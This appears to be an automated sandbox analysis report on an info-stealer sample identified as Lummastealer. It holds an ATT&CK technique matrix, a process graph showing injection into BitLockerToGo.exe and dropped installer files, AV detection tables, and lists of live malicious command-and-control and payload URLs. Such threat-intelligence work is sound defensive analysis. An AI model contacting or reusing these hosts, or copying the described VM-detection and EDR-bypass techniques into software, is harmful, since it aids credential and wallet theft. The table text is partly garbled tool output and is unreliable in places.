              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		121
              Virtualization/Sandbox Evasion              		LSASS Memory421
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		Logon Script (Windows)1
              DLL Side-Loading              		311
              Process Injection              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS121
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Abuse Elevation Control Mechanism              		LSA Secrets1
              Application Window Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Obfuscated Files or Information              		Cached Domain Credentials2
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync11
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem224
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581892 Sample: MdhO83N5Fm.exe Startdate: 29/12/2024 Architecture: WINDOWS Score: 100 89 simplerapplau.click 2->89 91 dfgh.online 2->91 93 2 other IPs or domains 2->93 103 Suricata IDS alerts for network traffic 2->103 105 Found malware configuration 2->105 107 Malicious sample detected (through community Yara rule) 2->107 109 8 other signatures 2->109 13 MdhO83N5Fm.exe 2->13         started        signatures3 process4 signatures5 121 Found many strings related to Crypto-Wallets (likely being stolen) 13->121 123 Writes to foreign memory regions 13->123 125 Allocates memory in foreign processes 13->125 127 2 other signatures 13->127 16 BitLockerToGo.exe 1 13->16         started        process6 dnsIp7 83 simplerapplau.click 172.67.152.160, 443, 49730, 49736 CLOUDFLARENETUS United States 16->83 85 cegu.shop 185.161.251.21, 443, 49788 NTLGB United Kingdom 16->85 87 klipvumisui.shop 172.67.208.58, 443, 49796 CLOUDFLARENETUS United States 16->87 67 C:\Users\user\...\MBL4EF1WJ27Y40L4B4G3AI.exe, PE32 16->67 dropped 95 Suspicious powershell command line found 16->95 97 Query firmware table information (likely to detect VMs) 16->97 99 Found many strings related to Crypto-Wallets (likely being stolen) 16->99 101 3 other signatures 16->101 21 MBL4EF1WJ27Y40L4B4G3AI.exe 2 16->21         started        25 powershell.exe 15 15 16->25         started        file8 signatures9 process10 file11 77 C:\Users\user\...\MBL4EF1WJ27Y40L4B4G3AI.tmp, PE32 21->77 dropped 111 Multi AV Scanner detection for dropped file 21->111 27 MBL4EF1WJ27Y40L4B4G3AI.tmp 3 5 21->27         started        30 conhost.exe 25->30         started        signatures12 process13 file14 79 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 27->79 dropped 81 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 27->81 dropped 32 MBL4EF1WJ27Y40L4B4G3AI.exe 2 27->32         started        process15 file16 65 C:\Users\user\...\MBL4EF1WJ27Y40L4B4G3AI.tmp, PE32 32->65 dropped 35 MBL4EF1WJ27Y40L4B4G3AI.tmp 5 7 32->35         started        process17 file18 69 C:\Users\user\AppData\...\is-CNRVF.tmp, PE32 35->69 dropped 71 C:\Users\user\...\BrightLib.exe (copy), PE32 35->71 dropped 73 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 35->73 dropped 75 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 35->75 dropped 38 BrightLib.exe 35->38         started        41 cmd.exe 1 35->41         started        43 cmd.exe 1 35->43         started        45 5 other processes 35->45 process19 signatures20 113 Tries to detect virtualization through RDTSC time measurements 38->113 115 Sample or dropped binary is a compiled AutoHotkey binary 38->115 117 Switches to a custom stack to bypass stack traces 38->117 119 Found direct / indirect Syscall (likely to bypass EDR) 38->119 47 conhost.exe 41->47         started        61 2 other processes 41->61 49 conhost.exe 43->49         started        51 tasklist.exe 1 43->51         started        53 find.exe 1 43->53         started        55 conhost.exe 45->55         started        57 conhost.exe 45->57         started        59 tasklist.exe 1 45->59         started        63 10 other processes 45->63 process21

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              MdhO83N5Fm.exe15%VirustotalBrowse
              MdhO83N5Fm.exe29%ReversingLabsWin32.Spyware.Lummastealer

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe14%ReversingLabsWin32.Trojan.Hulk
              C:\Users\user\AppData\Local\Temp\is-0FNEB.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-0FNEB.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp3%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp3%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-V3A6I.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-V3A6I.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)8%ReversingLabs
              C:\Users\user\AppData\Roaming\ColorStreamLib\is-CNRVF.tmp8%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://simplerapplau.click/100%Avira URL Cloudmalware
              https://cegu.shop/100%Avira URL Cloudmalware
              http://www.opengis.net/gml0%Avira URL Cloudsafe
              http://www.topografix.com/GPX/1/10%Avira URL Cloudsafe
              https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPK100%Avira URL Cloudmalware
              http://www.opengis.net/gml/3.20%Avira URL Cloudsafe
              https://klipvumisui.shop:443/int_clp_sha.txt100%Avira URL Cloudmalware
              https://dfgh.online/invoker.php?compName=0%Avira URL Cloudsafe
              https://%s.amazonaws.com/%s/%sifSourceMetagenerationNotMatchillegal0%Avira URL Cloudsafe
              http://www.collada.org/2005/11/COLLADASchema0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txtt100%Avira URL Cloudmalware
              https://docs.ntfy.sh/publish/#scheduled-delivery0%Avira URL Cloudsafe
              https://klipvumisui.shop/l100%Avira URL Cloudmalware
              simplerapplau.click100%Avira URL Cloudmalware
              https://simplerapplau.click/skQ&t)100%Avira URL Cloudmalware
              https://klipvumisui.shop/int_clp_sha.txt100%Avira URL Cloudmalware
              https://docs.ntfy.sh/publish/#action-buttons0%Avira URL Cloudsafe
              https://simplerapplau.click/api100%Avira URL Cloudmalware
              https://simplerapplau.click/co100%Avira URL Cloudmalware
              https://simplerapplau.click/ta100%Avira URL Cloudmalware
              https://simplerapplau.click/s100%Avira URL Cloudmalware
              https://simplerapplau.click/%s100%Avira URL Cloudmalware
              http://hu.utf8hybull;hyphen;h0%Avira URL Cloudsafe
              https://simplerapplau.click/pi100%Avira URL Cloudmalware
              https://klipvumisui.shop/100%Avira URL Cloudmalware
              https://simplerapplau.click/pgR100%Avira URL Cloudmalware
              http://169.254.169.254/latesthttp://0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txt100%Avira URL Cloudmalware
              http://169.254.170.2if/with0%Avira URL Cloudsafe
              http://www.opengis.net/kml/2.20%Avira URL Cloudsafe
              http://www.opengis.net/gml/3.3/exr0%Avira URL Cloudsafe
              https://simplerapplau.click:443/api100%Avira URL Cloudmalware
              https://%s.amazonaws.com/%sifSourceMetagenerationMatchif_metageneration_not_matchignoring0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txtk100%Avira URL Cloudmalware
              https://simplerapplau.click:443/apicrosoft100%Avira URL Cloudmalware
              https://simplerapplau.click/G100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                simplerapplau.click
                		172.67.152.160
                		truetrue
                  		unknown
                  klipvumisui.shop
                  		172.67.208.58
                  		truefalse
                    		high
                    dfgh.online
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      deafeninggeh.bizfalse
                        		high
                        diffuculttan.xyzfalse
                          		high
                          effecterectz.xyzfalse
                            		high
                            https://klipvumisui.shop/int_clp_sha.txtfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://simplerapplau.click/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            simplerapplau.clicktrue
                            • Avira URL Cloud: malware
                            		unknown
                            immureprech.bizfalse
                              		high
                              debonairnukk.xyzfalse
                                		high
                                https://cegu.shop/8574262446/ph.txtfalse
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUBitLockerToGo.exe, 00000003.00000003.2621648439.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2627323054.0000000004EBE000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2630978300.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2626970933.0000000004DB3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2632990045.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2625095714.0000000004EB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2636022656.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2626727023.0000000004FCE000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2625664418.0000000004EB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2624416779.0000000004F9B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2632343356.0000000004ED8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2636187778.000000000504A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2622417689.0000000004DB3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2628042716.0000000004DBC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2625776085.0000000004DB7000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2626281030.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2620043420.0000000004F2A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2625553232.0000000004DB6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2623771449.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2623459096.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2621837423.0000000004E85000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://certs.securetrust.com/CA0:BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://simplerapplau.click/BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2504321115.0000000000548000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPKBitLockerToGo.exe, 00000003.00000003.2617535427.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754752871.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2756419053.00000000004B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://klipvumisui.shop:443/int_clp_sha.txtBitLockerToGo.exe, 00000003.00000003.2617535427.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754752871.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2756419053.00000000004B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://ocsp.vikingcloud.com/0ABitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://certs.securetrust.com/issuers/TWGCA.crt0BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://ocsp.vikingcloud.com/0:BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://cegu.shop/BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000545000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://dfgh.online/invoker.php?compName=BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000543000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://s3.amazonaws.com/doc/2006-03-01/MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                              		high
                                              http://crl.vikingcloud.com/TWGCA.crl0tBitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://certs.securetrust.com/CA05BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.opengis.net/gmlMdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.collada.org/2005/11/COLLADASchemaMdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B886000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.topografix.com/GPX/1/1MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://%s.amazonaws.com/%s/%sifSourceMetagenerationNotMatchillegalMdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.opengis.net/gml/3.2MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://klipvumisui.shop/int_clp_sha.txttBitLockerToGo.exe, 00000003.00000002.2756645110.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754604014.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617397986.0000000000545000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://certs.securetrust.com/CA0BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://klipvumisui.shop/lBitLockerToGo.exe, 00000003.00000002.2756419053.0000000000527000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617473616.0000000000521000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.0000000000527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://crl.trustwave.com/TWGCA.crl0nBitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://docs.ntfy.sh/publish/#scheduled-deliveryMdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://simplerapplau.click/skQ&t)BitLockerToGo.exe, 00000003.00000003.2407805185.000000000053C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://docs.ntfy.sh/publish/#action-buttonsMdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crl.securetrust.com/TWGCSCA_L1.crl0yBitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://developers.google.com/accounts/docs/application-default-credentialspkcs7:MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                          		high
                                                          https://simplerapplau.click/coBitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://simplerapplau.click/taBitLockerToGo.exe, 00000003.00000002.2756645110.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2530677325.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754604014.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617397986.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2504321115.0000000000548000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://simplerapplau.click/%sBitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://simplerapplau.click/sBitLockerToGo.exe, 00000003.00000003.2504321115.0000000000548000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://simplerapplau.click/piBitLockerToGo.exe, 00000003.00000003.2530677325.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617397986.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2504321115.0000000000548000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://klipvumisui.shop/BitLockerToGo.exe, 00000003.00000002.2756419053.0000000000527000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617473616.0000000000521000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.0000000000527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://hu.utf8hybull;hyphen;hMdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://simplerapplau.click/pgRBitLockerToGo.exe, 00000003.00000003.2530677325.0000000000548000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://earth.google.com/kml/2.2MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://169.254.169.254/latesthttp://MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://earth.google.com/kml/2.0MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schema.org/extensionshttps://%s/%s/%sMdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                  		high
                                                                  http://earth.google.com/kml/2.1MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://169.254.170.2if/withMdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.opengis.net/kml/2.2MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://simplerapplau.click:443/apiBitLockerToGo.exe, 00000003.00000003.2617535427.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754752871.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2756419053.00000000004B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://ocsp.securetrust.com/0?BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.opengis.net/gml/3.3/exrMdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000003.2248901262.000000000B898000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://github.com/Finb/Bark/tree/master/SoundsMdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                            		high
